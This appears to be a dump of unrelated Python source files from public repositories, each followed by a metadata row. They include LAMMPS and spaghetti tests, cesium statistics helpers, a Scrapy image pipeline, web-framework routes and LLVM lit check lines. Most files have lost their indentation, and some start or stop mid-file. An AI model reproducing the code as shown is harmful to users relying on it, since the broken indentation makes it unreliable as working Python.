assert np.all(np.isclose(bounds, [[xlo, xlo+a], [ylo, ylo+b], [zlo, zlo+c]]))
assert np.all(np.isclose(tilts, (0, 0, 0)))
assert np.all(np.isclose(rotation_matrix, np.eye(3)))
points = np.random.random((10, 3))
points_new_1 = lammps.core.transform_cartesian_vector_to_lammps_vector(points, rotation_matrix)
assert np.all(np.isclose(points, points_new_1))
points_new_2 = lammps.core.transform_cartesian_vector_to_lammps_vector(points, rotation_matrix, origin)
assert np.all(np.isclose(points + origin, points_new_2))
def test_lattice_const_to_lammps_box_rhomb():
# 3C-SiC
lengths = (3.0968, 3.0968, 3.0968)
angles = (pi/3, pi/3, pi/3)
bounds, tilts, rotation_matrix = lammps.core.lattice_const_to_lammps_box(lengths, angles)
assert np.all(np.isclose(bounds, ((0, 3.0968), (0, 2.6819074704396493), (0, 2.528526611816982)), atol=1e-3))
assert np.all(np.isclose(tilts, (1.5484000000000004, 1.5484000000000004, 0.8939691568132165)))
def test_lammps_box_to_lattice_const_cubic():
bounds = [[0, 5], [0, 5], [0, 5]]
tilts = (0, 0, 0)
origin = (0, 0, 0)
lengths, angles, origin = lammps.core.lammps_box_to_lattice_const(bounds, tilts)
assert np.all(np.isclose(lengths, (5, 5, 5)))
assert np.all(np.isclose(angles, (pi/2, pi/2, pi/2)))
def test_lammps_box_orthogonal_reversible():
lengths = (4, 4, 4)
angles = (pi/2, pi/2, pi/2)
origin = (1, 2, 3)
bounds, tilts, rotation_matrix = lammps.core.lattice_const_to_lammps_box(lengths, angles, origin=origin)
lengths_r, angles_r, origin_r = lammps.core.lammps_box_to_lattice_const(bounds, tilts)
assert np.all(np.isclose(lengths, lengths_r))
assert np.all(np.isclose(angles, angles_r))
assert np.all(np.isclose(origin, origin_r))
def test_lammps_box_tetrahedral_reversible():
# LiTaO3
lengths = (5.5338, 5.5338, 5.5338)
angles = (56.14486291 * pi/180, 56.14486291 * pi/180, 56.14486291 * pi/180)
origin = (1, 2, 3)
bounds, tilts, rotation_matrix = lammps.core.lattice_const_to_lammps_box(lengths, angles, origin=origin)
lengths_r, angles_r, origin_r = lammps.core.lammps_box_to_lattice_const(bounds, tilts)
assert np.all(np.isclose(lengths, lengths_r))
assert np.all(np.isclose(angles, angles_r))
assert np.all(np.isclose(origin, origin_r))
def test_lammps_initial_box(lmp):
assert lmp.box.dimension == 3
assert np.all(np.isclose(lmp.box.lengths, (1., 1., 1.)))
assert np.all(np.isclose(lmp.box.angles, (pi/2., pi/2., pi/2.)))
assert np.all(np.isclose(lmp.box.bounds, [[-0.5, 0.5], [-0.5, 0.5], [-0.5, 0.5]]))
assert np.all(np.isclose(lmp.box.tilts, [0, 0, 0]))
assert np.all(np.isclose(lmp.box.lengths_angles, [[1, 1, 1], [pi/2, pi/2, pi/2]]))
    # LAMMPS has some odd initial behavior: the default 1x1x1 unit cell
    # reports a volume of 0, and non-deterministically either 0 or inf,
    # so this check is disabled.
    # assert np.isclose(lmp.box.volume, 0.)
def test_lammps_set_box_from_lattice_const(lmp):
atom_types = 5
lengths = (10, 10, 10)
angles = (pi/2., pi/2., pi/2.)
lmp.box.from_lattice_const(atom_types, lengths, angles)
assert np.all(np.isclose(lmp.box.lengths, lengths))
assert np.all(np.isclose(lmp.box.angles, angles))
assert lmp.system.total == 0
assert len(lmp.system.atom_types) == atom_types
assert np.isclose(lmp.box.volume, 10**3)
def test_lammps_update_lattice_const(lmp):
lengths = (10, 10, 10)
angles = (pi/2., pi/2., pi/2.)
lmp.box.update_lattice_const(lengths, angles)
assert np.all(np.isclose(lmp.box.lengths, lengths))
assert np.all(np.isclose(lmp.box.angles, angles))
assert np.isclose(lmp.box.volume, 10**3)
| 39.448819 | 112 | 0.67984 | 825 | 5,010 | 3.96 | 0.111515 | 0.080808 | 0.10101 | 0.119376 | 0.756657 | 0.749617 | 0.706152 | 0.668197 | 0.592287 | 0.583716 | 0 | 0.072762 | 0.166068 | 5,010 | 126 | 113 | 39.761905 | 0.709191 | 0.037325 | 0 | 0.553191 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.37234 | 1 | 0.106383 | false | 0 | 0.042553 | 0 | 0.148936 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
6a95309d9f480004128354908a777169de1048da | 641 | py | Python | spaghetti/tests/test_api_network.py | gegen07/spaghetti | f10f9d016deeb8d4cdd63377304fc8e3b8492a0f | [
"BSD-3-Clause"
] | 182 | 2018-07-23T20:17:32.000Z | 2022-03-28T07:08:43.000Z | spaghetti/tests/test_api_network.py | gegen07/spaghetti | f10f9d016deeb8d4cdd63377304fc8e3b8492a0f | [
"BSD-3-Clause"
] | 563 | 2017-04-14T23:39:21.000Z | 2022-02-12T20:34:21.000Z | spaghetti/tests/test_api_network.py | gegen07/spaghetti | f10f9d016deeb8d4cdd63377304fc8e3b8492a0f | [
"BSD-3-Clause"
] | 51 | 2017-04-14T23:40:31.000Z | 2022-03-31T01:41:56.000Z | """ Testing for the spaghetti api import structure.
"""
import unittest
from .network_unittest_classes import TestNetwork
from .network_unittest_classes import TestNetworkPointPattern
from .network_unittest_classes import TestNetworkAnalysis
# api import structure
import spaghetti
# run tests on spaghetti.network.Network
TestNetwork.spaghetti = spaghetti
TestNetwork()
# run tests on spaghetti.network.PointPattern
TestNetworkPointPattern.spaghetti = spaghetti
TestNetworkPointPattern()
# run tests on spaghetti.analysis
TestNetworkAnalysis.spaghetti = spaghetti
TestNetworkAnalysis()
if __name__ == "__main__":
unittest.main()
| 23.740741 | 61 | 0.826833 | 66 | 641 | 7.818182 | 0.333333 | 0.063953 | 0.110465 | 0.151163 | 0.286822 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.112324 | 641 | 26 | 62 | 24.653846 | 0.906854 | 0.287051 | 0 | 0 | 0 | 0 | 0.017937 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.384615 | 0 | 0.384615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
6aa9bb696576cb54c5c762feaf552f7b23cea8f0 | 1,974 | py | Python | cesium/features/common_functions.py | acrellin/cesium | 9d33edc0f9b3a79c68070826c0f390896abe294d | [
"BSD-3-Clause"
] | 603 | 2016-04-15T00:11:07.000Z | 2022-03-18T09:10:39.000Z | cesium/features/common_functions.py | acrellin/cesium | 9d33edc0f9b3a79c68070826c0f390896abe294d | [
"BSD-3-Clause"
] | 146 | 2016-03-17T19:58:24.000Z | 2022-02-05T20:36:03.000Z | cesium/features/common_functions.py | acrellin/cesium | 9d33edc0f9b3a79c68070826c0f390896abe294d | [
"BSD-3-Clause"
] | 84 | 2016-04-13T23:30:58.000Z | 2022-03-18T07:34:09.000Z | import numpy as np
from scipy import stats
def max_slope(t, x):
"""Compute the largest rate of change in the observed data."""
slopes = np.diff(x) / np.diff(t)
return np.max(np.abs(slopes))
def maximum(x):
"""Maximum observed value."""
return np.max(x)
def median(x):
"""Median of observed values."""
return np.median(x)
def median_absolute_deviation(x):
"""Median absolute deviation (from the median) of the observed values."""
return np.median(np.abs(x - np.median(x)))
def minimum(x):
"""Minimum observed value."""
return np.min(x)
def percent_beyond_1_std(x, e):
"""Percentage of values more than 1 std. dev. from the weighted average."""
dists_from_mu = x - weighted_average(x, e)
return np.mean(np.abs(dists_from_mu) > weighted_std_dev(x, e))
def percent_close_to_median(x, window_frac=0.1):
"""Percentage of values within window_frac*(max(x)-min(x)) of median."""
window = (x.max() - x.min()) * window_frac
return np.mean(np.abs(x - np.median(x)) < window)
def skew(x):
"""Skewness of a dataset. Approximately 0 for Gaussian data."""
return stats.skew(x)
def std(x):
"""Standard deviation of observed values."""
return np.std(x)
def weighted_average(x, e):
"""Arithmetic mean of observed values, weighted by measurement errors."""
return np.average(x, weights=1. / (e**2))
def weighted_average_std_err(x, e):
"""
Standard deviation of the sample weighted average of values x with
measurement errors e.
Note: this is not the same as the weighted sample standard deviation;
this value only quantifies the measurement errors, not the dispersion of
the data.
"""
    # 1 / sqrt(sum of weights), with inverse-variance weights 1 / e**2
    # (consistent with weighted_average above).
    return np.sqrt(1.0 / np.sum(1.0 / e**2))
def weighted_std_dev(x, e):
"""Standard deviation of observed values, weighted by measurement errors."""
return np.sqrt(np.average((x - weighted_average(x, e))**2,
weights=1. / (e**2)))
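As a standalone sanity check (not part of the cesium test suite, hypothetical data), the inverse-variance weighting used above can be illustrated directly: points with small measurement errors dominate the weighted average, so a very noisy outlier barely moves it.

```python
import numpy as np

# Hypothetical data: two precise points and one very noisy outlier.
x = np.array([1.0, 2.0, 10.0])
e = np.array([0.1, 0.1, 10.0])

# Same weighting as weighted_average above: weights = 1 / e**2.
wavg = np.average(x, weights=1.0 / e**2)

# The outlier at 10.0 barely pulls the mean away from (1 + 2) / 2 = 1.5.
print(round(wavg, 4))  # -> 1.5004
```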
| 26.675676 | 80 | 0.658055 | 305 | 1,974 | 4.17377 | 0.262295 | 0.069128 | 0.050275 | 0.051846 | 0.28751 | 0.103692 | 0.080126 | 0.080126 | 0.080126 | 0 | 0 | 0.008307 | 0.207194 | 1,974 | 73 | 81 | 27.041096 | 0.805112 | 0.412867 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0 | 0.066667 | 0 | 0.866667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
6ab1e103fbf234d369d759be37b846a948dab2da | 712 | py | Python | hacking/imgur-image-scraping-spider/pipelines.py | Dilmuratjan/MyProject | 26f4ee708eb4a7ceef780842ad737fef64a39d7e | [
"WTFPL"
] | 2 | 2017-02-19T15:11:06.000Z | 2017-02-22T18:34:10.000Z | hacking/imgur-image-scraping-spider/pipelines.py | Dilmuratjan/MyProject | 26f4ee708eb4a7ceef780842ad737fef64a39d7e | [
"WTFPL"
] | null | null | null | hacking/imgur-image-scraping-spider/pipelines.py | Dilmuratjan/MyProject | 26f4ee708eb4a7ceef780842ad737fef64a39d7e | [
"WTFPL"
] | 4 | 2017-02-26T08:10:30.000Z | 2017-05-02T10:02:03.000Z | import scrapy
from scrapy.pipelines.images import ImagesPipeline  # modern import path (scrapy.contrib has been removed)
ITEM_PIPELINES = {'imgur.pipelines.ImgurPipeline': 1}
class ImgurPipeline(ImagesPipeline):
def set_filename(self, response):
        # TODO: validate that the title yields a safe filename (e.g. with a regex).
return 'full/{0}.jpg'.format(response.meta['title'][0])
def get_media_requests(self, item, info):
for image_url in item['image_urls']:
yield scrapy.Request(image_url, meta={'title': item['title']})
def get_images(self, response, request, info):
for key, image, buf in super(ImgurPipeline, self).get_images(response, request, info):
key = self.set_filename(response)
yield key, image, buf
| 22.967742 | 89 | 0.703652 | 97 | 712 | 5.061856 | 0.494845 | 0.044807 | 0.077393 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005137 | 0.179775 | 712 | 30 | 90 | 23.733333 | 0.835616 | 0.08427 | 0 | 0 | 0 | 0 | 0.108197 | 0.047541 | 0 | 0 | 0 | 0 | 0 | 1 | 0.230769 | false | 0 | 0.153846 | 0.076923 | 0.538462 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
6ab427479b343856ab22ab50d8dd0460263d9bc0 | 83 | py | Python | natlutil/lemmatizer/__init__.py | alexandredias3d/natlutil | 6d6325d4dc8892c96ff4827873cb1530813c97db | [
"Apache-2.0"
] | null | null | null | natlutil/lemmatizer/__init__.py | alexandredias3d/natlutil | 6d6325d4dc8892c96ff4827873cb1530813c97db | [
"Apache-2.0"
] | 1 | 2019-06-07T02:00:43.000Z | 2019-06-07T02:00:43.000Z | natlutil/lemmatizer/__init__.py | alexandredias3d/natlang | 6d6325d4dc8892c96ff4827873cb1530813c97db | [
"Apache-2.0"
] | null | null | null | from natlutil.lemmatizer.unitexpb import *
__all__ = [
'UnitexPBDictionary'
]
| 13.833333 | 42 | 0.73494 | 7 | 83 | 8.142857 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.168675 | 83 | 5 | 43 | 16.6 | 0.826087 | 0 | 0 | 0 | 0 | 0 | 0.216867 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
6ab87dc47936cd627d6ed01d824ff3d42f43ded2 | 176 | py | Python | examples/my_blueprint.py | fmux/sanicpluginsframework | 175525e85504fcf6e7d32bf12874578fc14c115a | [
"MIT"
] | 46 | 2017-10-19T00:59:07.000Z | 2020-11-16T21:16:47.000Z | examples/my_blueprint.py | fmux/sanicpluginsframework | 175525e85504fcf6e7d32bf12874578fc14c115a | [
"MIT"
] | 17 | 2017-12-25T00:27:36.000Z | 2021-03-21T14:45:20.000Z | examples/my_blueprint.py | fmux/sanicpluginsframework | 175525e85504fcf6e7d32bf12874578fc14c115a | [
"MIT"
] | 10 | 2017-12-22T03:26:16.000Z | 2020-10-19T19:16:59.000Z | from sanic import Blueprint
api_v1 = Blueprint(__name__, None)
@api_v1.middleware(attach_to="request")
async def bp_mw(request):
print("Hello bp")
__all__ = ['api_v1']
| 16 | 39 | 0.727273 | 26 | 176 | 4.423077 | 0.730769 | 0.130435 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019868 | 0.142045 | 176 | 10 | 40 | 17.6 | 0.741722 | 0 | 0 | 0 | 0 | 0 | 0.119318 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0.5 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 2 |
6ac3ffe45dd0af323c8514ef525e2a106b062de5 | 292 | py | Python | webhook/urls.py | userlocalhost/airone-1 | 8aabeabb65fd2117876380f1f69a04f0cf39889d | [
"MIT"
] | null | null | null | webhook/urls.py | userlocalhost/airone-1 | 8aabeabb65fd2117876380f1f69a04f0cf39889d | [
"MIT"
] | null | null | null | webhook/urls.py | userlocalhost/airone-1 | 8aabeabb65fd2117876380f1f69a04f0cf39889d | [
"MIT"
] | null | null | null | from django.conf.urls import url, include
from . import views
urlpatterns = [
url(r"^api/v1/", include(("webhook.api_v1.urls", "webhook.api_v1"))),
url(r"^api/v2/", include(("webhook.api_v2.urls", "webhook.api_v2"))),
url(r"^(\d+)$", views.list_webhook, name="list_webhook"),
]
| 29.2 | 73 | 0.650685 | 44 | 292 | 4.181818 | 0.386364 | 0.217391 | 0.076087 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.023438 | 0.123288 | 292 | 9 | 74 | 32.444444 | 0.695313 | 0 | 0 | 0 | 0 | 0 | 0.34589 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.285714 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
6ac87723db27b50eaf3e3b2c6575d88c16918e02 | 493 | py | Python | spider/bookinfo/items.py | leitelyaya/Broadview-analysing-sales-figures | bdff4239fd71b5077bc05703757d9f5d2610c536 | [
"Apache-2.0"
] | 5 | 2018-08-20T03:54:30.000Z | 2019-03-08T14:43:37.000Z | spider/bookinfo/items.py | leitelyaya/Broadview-analysing-sales-figures | bdff4239fd71b5077bc05703757d9f5d2610c536 | [
"Apache-2.0"
] | null | null | null | spider/bookinfo/items.py | leitelyaya/Broadview-analysing-sales-figures | bdff4239fd71b5077bc05703757d9f5d2610c536 | [
"Apache-2.0"
] | 5 | 2018-01-07T01:33:00.000Z | 2019-03-08T14:44:24.000Z | # -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# http://doc.scrapy.org/en/latest/topics/items.html
import scrapy
class BookinfoItem(scrapy.Item):
# define the fields for your item here like:
# name = scrapy.Field()
    coverImage = scrapy.Field()  # "cover.jpg"
    classify = scrapy.Field()    # category
    index = scrapy.Field()       # rank on the listing page
    pageNo = scrapy.Field()      # page number within the listing
    content = scrapy.Field()     # HTML content
| 25.947368 | 51 | 0.636917 | 61 | 493 | 5.147541 | 0.672131 | 0.210191 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002571 | 0.210953 | 493 | 18 | 52 | 27.388889 | 0.804627 | 0.505071 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
6acdec1991bc193db767a67b9d8b1fe1727998d7 | 518 | py | Python | tests/r/test_pension.py | hajime9652/observations | 2c8b1ac31025938cb17762e540f2f592e302d5de | [
"Apache-2.0"
] | 199 | 2017-07-24T01:34:27.000Z | 2022-01-29T00:50:55.000Z | tests/r/test_pension.py | hajime9652/observations | 2c8b1ac31025938cb17762e540f2f592e302d5de | [
"Apache-2.0"
] | 46 | 2017-09-05T19:27:20.000Z | 2019-01-07T09:47:26.000Z | tests/r/test_pension.py | hajime9652/observations | 2c8b1ac31025938cb17762e540f2f592e302d5de | [
"Apache-2.0"
] | 45 | 2017-07-26T00:10:44.000Z | 2022-03-16T20:44:59.000Z | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import shutil
import sys
import tempfile
from observations.r.pension import pension
def test_pension():
"""Test module pension.py by downloading
pension.csv and testing shape of
extracted data has 194 rows and 19 columns
"""
test_path = tempfile.mkdtemp()
x_train, metadata = pension(test_path)
try:
assert x_train.shape == (194, 19)
  except Exception:
    shutil.rmtree(test_path)
    raise
| 21.583333 | 45 | 0.754826 | 72 | 518 | 5.152778 | 0.569444 | 0.080863 | 0.12938 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.023529 | 0.179537 | 518 | 23 | 46 | 22.521739 | 0.849412 | 0.218147 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.066667 | 1 | 0.066667 | false | 0 | 0.466667 | 0 | 0.533333 | 0.066667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
6ad4b0307023ca0f07b1c891343ae1a90f5a5ad5 | 6,436 | py | Python | llvm/utils/lit/tests/shtest-format.py | medismailben/llvm-project | e334a839032fe500c3bba22bf976ab7af13ce1c1 | [
"Apache-2.0"
] | 158 | 2016-07-21T10:45:05.000Z | 2022-03-25T00:56:20.000Z | llvm/utils/lit/tests/shtest-format.py | medismailben/llvm-project | e334a839032fe500c3bba22bf976ab7af13ce1c1 | [
"Apache-2.0"
] | 59 | 2019-02-26T18:57:27.000Z | 2020-08-04T20:49:55.000Z | llvm/utils/lit/tests/shtest-format.py | medismailben/llvm-project | e334a839032fe500c3bba22bf976ab7af13ce1c1 | [
"Apache-2.0"
] | 62 | 2016-08-29T17:28:11.000Z | 2021-12-29T17:55:58.000Z | # Check the various features of the ShTest format.
#
# RUN: rm -f %t.xml
# RUN: not %{lit} -j 1 -v %{inputs}/shtest-format --xunit-xml-output %t.xml > %t.out
# RUN: FileCheck < %t.out %s
# RUN: FileCheck --check-prefix=XUNIT < %t.xml %s
# END.
# CHECK: -- Testing:
# CHECK: PASS: shtest-format :: argv0.txt
# CHECK: FAIL: shtest-format :: external_shell/fail.txt
# CHECK-NEXT: *** TEST 'shtest-format :: external_shell/fail.txt' FAILED ***
# CHECK: Command Output (stdout):
# CHECK-NEXT: --
# CHECK-NEXT: line 1: failed test output on stdout
# CHECK-NEXT: line 2: failed test output on stdout
# CHECK: Command Output (stderr):
# CHECK-NEXT: --
# CHECK-NEXT: cat{{(\.exe)?}}: {{cannot open does-not-exist|does-not-exist: No such file or directory}}
# CHECK: --
# CHECK: FAIL: shtest-format :: external_shell/fail_with_bad_encoding.txt
# CHECK-NEXT: *** TEST 'shtest-format :: external_shell/fail_with_bad_encoding.txt' FAILED ***
# CHECK: Command Output (stdout):
# CHECK-NEXT: --
# CHECK-NEXT: a line with bad encoding:
# CHECK: --
# CHECK: PASS: shtest-format :: external_shell/pass.txt
# CHECK: FAIL: shtest-format :: fail.txt
# CHECK-NEXT: *** TEST 'shtest-format :: fail.txt' FAILED ***
# CHECK-NEXT: Script:
# CHECK-NEXT: --
# CHECK-NEXT: printf "line 1
# CHECK-NEXT: false
# CHECK-NEXT: --
# CHECK-NEXT: Exit Code: 1
#
# CHECK: Command Output (stdout):
# CHECK-NEXT: --
# CHECK-NEXT: $ ":" "RUN: at line 1"
# CHECK-NEXT: $ "printf"
# CHECK-NEXT: # command output:
# CHECK-NEXT: line 1: failed test output on stdout
# CHECK-NEXT: line 2: failed test output on stdout
# CHECK: UNRESOLVED: shtest-format :: no-test-line.txt
# CHECK: PASS: shtest-format :: pass.txt
# CHECK: UNSUPPORTED: shtest-format :: requires-missing.txt
# CHECK: PASS: shtest-format :: requires-present.txt
# CHECK: UNRESOLVED: shtest-format :: requires-star.txt
# CHECK: UNSUPPORTED: shtest-format :: requires-triple.txt
# CHECK: PASS: shtest-format :: unsupported-expr-false.txt
# CHECK: UNSUPPORTED: shtest-format :: unsupported-expr-true.txt
# CHECK: UNRESOLVED: shtest-format :: unsupported-star.txt
# CHECK: UNSUPPORTED: shtest-format :: unsupported_dir/some-test.txt
# CHECK: PASS: shtest-format :: xfail-expr-false.txt
# CHECK: XFAIL: shtest-format :: xfail-expr-true.txt
# CHECK: XFAIL: shtest-format :: xfail-feature.txt
# CHECK: XFAIL: shtest-format :: xfail-target.txt
# CHECK: XFAIL: shtest-format :: xfail.txt
# CHECK: XPASS: shtest-format :: xpass.txt
# CHECK-NEXT: *** TEST 'shtest-format :: xpass.txt' FAILED ***
# CHECK-NEXT: Script
# CHECK-NEXT: --
# CHECK-NEXT: true
# CHECK-NEXT: --
# CHECK: Testing Time
# CHECK: Unexpected Passing Tests (1)
# CHECK: shtest-format :: xpass.txt
# CHECK: Failing Tests (3)
# CHECK: shtest-format :: external_shell/fail.txt
# CHECK: shtest-format :: external_shell/fail_with_bad_encoding.txt
# CHECK: shtest-format :: fail.txt
# CHECK: Expected Passes : 7
# CHECK: Expected Failures : 4
# CHECK: Unsupported Tests : 4
# CHECK: Unresolved Tests : 3
# CHECK: Unexpected Passes : 1
# CHECK: Unexpected Failures: 3
# XUNIT: <?xml version="1.0" encoding="UTF-8" ?>
# XUNIT-NEXT: <testsuites>
# XUNIT-NEXT: <testsuite name="shtest-format" tests="22" failures="7" skipped="4">
# XUNIT: <testcase classname="shtest-format.shtest-format" name="argv0.txt" time="{{[0-9]+\.[0-9]+}}"/>
# XUNIT: <testcase classname="shtest-format.external_shell" name="fail.txt" time="{{[0-9]+\.[0-9]+}}">
# XUNIT-NEXT: <failure{{[ ]*}}>
# XUNIT: </failure>
# XUNIT-NEXT: </testcase>
# XUNIT: <testcase classname="shtest-format.external_shell" name="fail_with_bad_encoding.txt" time="{{[0-9]+\.[0-9]+}}">
# XUNIT-NEXT: <failure{{[ ]*}}>
# XUNIT: </failure>
# XUNIT-NEXT: </testcase>
# XUNIT: <testcase classname="shtest-format.external_shell" name="pass.txt" time="{{[0-9]+\.[0-9]+}}"/>
# XUNIT: <testcase classname="shtest-format.shtest-format" name="fail.txt" time="{{[0-9]+\.[0-9]+}}">
# XUNIT-NEXT: <failure{{[ ]*}}>
# XUNIT: </failure>
# XUNIT-NEXT: </testcase>
# XUNIT: <testcase classname="shtest-format.shtest-format" name="no-test-line.txt" time="{{[0-9]+\.[0-9]+}}">
# XUNIT-NEXT: <failure{{[ ]*}}>
# XUNIT: </failure>
# XUNIT-NEXT: </testcase>
# XUNIT: <testcase classname="shtest-format.shtest-format" name="pass.txt" time="{{[0-9]+\.[0-9]+}}"/>
# XUNIT: <testcase classname="shtest-format.shtest-format" name="requires-missing.txt" time="{{[0-9]+\.[0-9]+}}">
# XUNIT-NEXT:<skipped message="Skipping because of: a-missing-feature" />
# XUNIT: <testcase classname="shtest-format.shtest-format" name="requires-present.txt" time="{{[0-9]+\.[0-9]+}}"/>
# XUNIT: <testcase classname="shtest-format.shtest-format" name="requires-star.txt" time="{{[0-9]+\.[0-9]+}}">
# XUNIT-NEXT: <failure{{[ ]*}}>
# XUNIT: </failure>
# XUNIT-NEXT: </testcase>
# XUNIT: <testcase classname="shtest-format.shtest-format" name="requires-triple.txt" time="{{[0-9]+\.[0-9]+}}">
# XUNIT-NEXT:<skipped message="Skipping because of: x86_64" />
# XUNIT: <testcase classname="shtest-format.shtest-format" name="unsupported-expr-false.txt" time="{{[0-9]+\.[0-9]+}}"/>
# XUNIT: <testcase classname="shtest-format.shtest-format" name="unsupported-expr-true.txt" time="{{[0-9]+\.[0-9]+}}">
# XUNIT-NEXT:<skipped message="Skipping because of configuration." />
# XUNIT: <testcase classname="shtest-format.shtest-format" name="unsupported-star.txt" time="{{[0-9]+\.[0-9]+}}">
# XUNIT-NEXT: <failure{{[ ]*}}>
# XUNIT: </failure>
# XUNIT-NEXT: </testcase>
# XUNIT: <testcase classname="shtest-format.unsupported_dir" name="some-test.txt" time="{{[0-9]+\.[0-9]+}}">
# XUNIT-NEXT:<skipped message="Skipping because of configuration." />
# XUNIT: <testcase classname="shtest-format.shtest-format" name="xfail-expr-false.txt" time="{{[0-9]+\.[0-9]+}}"/>
# XUNIT: <testcase classname="shtest-format.shtest-format" name="xfail-expr-true.txt" time="{{[0-9]+\.[0-9]+}}"/>
# XUNIT: <testcase classname="shtest-format.shtest-format" name="xfail-feature.txt" time="{{[0-9]+\.[0-9]+}}"/>
# XUNIT: <testcase classname="shtest-format.shtest-format" name="xfail-target.txt" time="{{[0-9]+\.[0-9]+}}"/>
# XUNIT: <testcase classname="shtest-format.shtest-format" name="xfail.txt" time="{{[0-9]+\.[0-9]+}}"/>
# XUNIT: <testcase classname="shtest-format.shtest-format" name="xpass.txt" time="{{[0-9]+\.[0-9]+}}">
# XUNIT-NEXT: <failure{{[ ]*}}>
# XUNIT: </failure>
# XUNIT-NEXT: </testcase>
# XUNIT: </testsuite>
# XUNIT-NEXT: </testsuites>
| 39.243902 | 120 | 0.669204 | 886 | 6,436 | 4.832957 | 0.120767 | 0.19617 | 0.107894 | 0.137319 | 0.749883 | 0.68823 | 0.612798 | 0.585708 | 0.564222 | 0.498132 | 0 | 0.019741 | 0.110628 | 6,436 | 163 | 121 | 39.484663 | 0.728337 | 0.95463 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
6adb553dce195998456694bd789763a78896d906 | 221 | py | Python | setup.py | mikanbox/certbeginner | d147ddac13a8308ec1e07b56c872eb46c5a4a815 | [
"Apache-2.0"
] | null | null | null | setup.py | mikanbox/certbeginner | d147ddac13a8308ec1e07b56c872eb46c5a4a815 | [
"Apache-2.0"
] | null | null | null | setup.py | mikanbox/certbeginner | d147ddac13a8308ec1e07b56c872eb46c5a4a815 | [
"Apache-2.0"
] | null | null | null | from setuptools import setup
setup(
name='certbeginner',
version='1.0.0',
install_requires=['argparse'],
entry_points={
"console_scripts": ['crtbg = src.app:main']
}
